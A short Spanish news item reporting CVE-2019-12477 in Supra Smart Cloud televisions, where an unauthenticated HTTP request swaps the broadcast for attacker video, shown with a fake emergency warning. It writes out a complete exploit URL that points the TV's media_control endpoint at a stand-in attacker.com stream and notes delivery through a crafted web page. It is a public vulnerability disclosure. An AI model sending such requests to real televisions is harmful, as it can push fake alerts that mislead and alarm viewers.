En televisores Supra Smart Cloud Vulnerabilidad (CVE-2019-12477) que le permite reemplazar el programa visto actualmente con el contenido del atacante. Como ejemplo, se demuestra la salida de una advertencia ficticia sobre una situación de emergencia.
Para un ataque, basta con enviar una solicitud de red especialmente diseñada que no requiere autenticación. En particular, puede acceder al controlador “/remote/media_control?action=setUri&uri=” especificando la URL del archivo m3u8 con parámetros de vídeo, por ejemplo “http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8”.
En la mayoría de los casos, el acceso a la dirección IP del televisor está limitado a la red interna, pero dado que la solicitud se envía a través de HTTP, es posible utilizar métodos para acceder a los recursos internos cuando el usuario abre una página externa especialmente diseñada (por ejemplo, en bajo la apariencia de una solicitud de fotografía o usando el ).
Fuente: opennet.ru